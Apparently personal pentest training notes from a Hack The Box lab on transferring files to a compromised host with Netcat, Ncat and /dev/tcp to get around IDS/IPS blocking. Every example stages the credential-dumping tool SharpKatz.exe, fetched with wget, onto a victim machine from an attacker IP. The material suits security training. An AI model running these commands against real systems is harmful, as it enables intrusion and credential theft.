Listener on Compromised Machine sending from Attacker
(when IDS/IPS blocks outbound traffic)
Using old original Netcat:
Start listener on Compromised machine and write incoming data into a file
victim@target:~$ # Example using Original Netcat
victim@target:~$ nc -l -p 8000 > SharpKatz.exe
Send the data from our attacking machine;
Momothechi@htb[/htb]$ wget -q https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.7_x64/SharpKatz.exe
Momothechi@htb[/htb]$ # Example using Original Netcat
Momothechi@htb[/htb]$ nc -q 0 192.168.49.128 8000 < SharpKatz.exe
Using modern Ncat:
starting listener:
victim@target:~$ # Example using Ncat
victim@target:~$ ncat -l -p 8000 –recv-only > SharpKatz.exe
And send from attacking machine:
Momothechi@htb[/htb]$ wget -q https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.7_x64/SharpKatz.exe
Momothechi@htb[/htb]$ # Example using Ncat
Momothechi@htb[/htb]$ ncat –send-only 192.168.49.128 8000 < SharpKatz.exe
Listenere on Attacking machine connecting from compromised
(when IDS/IPS) blocks incoming traffic.
Using old original Netcat:
Start listener with input file:
Momothechi@htb[/htb]$ # Example using Original Netcat
Momothechi@htb[/htb]$ sudo nc -l -p 443 -q 0 < SharpKatz.exe
Connect from the compromised machine:
victim@target:~$ # Example using Original Netcat
victim@target:~$ nc 192.168.49.128 443 > SharpKatz.exe
Using Ncat:
Strt listener:
Momothechi@htb[/htb]$ # Example using Ncat
Momothechi@htb[/htb]$ sudo ncat -l -p 443 –send-only < SharpKatz.exe
Connect:
victim@target:~$ # Example using Ncat
victim@target:~$ ncat 192.168.49.128 443 –recv-only > SharpKatz.exe
When we dont have Ncat/Netcat on compromised machine - use /dev/tcp
Starting listener on attacking machine with file input:
Momothechi@htb[/htb]$ # Example using Ncat
Momothechi@htb[/htb]$ sudo ncat -l -p 443 –send-only < SharpKatz.exe
Connecting on the compromised machine using /dev/tcp:
victim@target:~$ cat < /dev/tcp/192.168.49.128/443 > SharpKatz.exe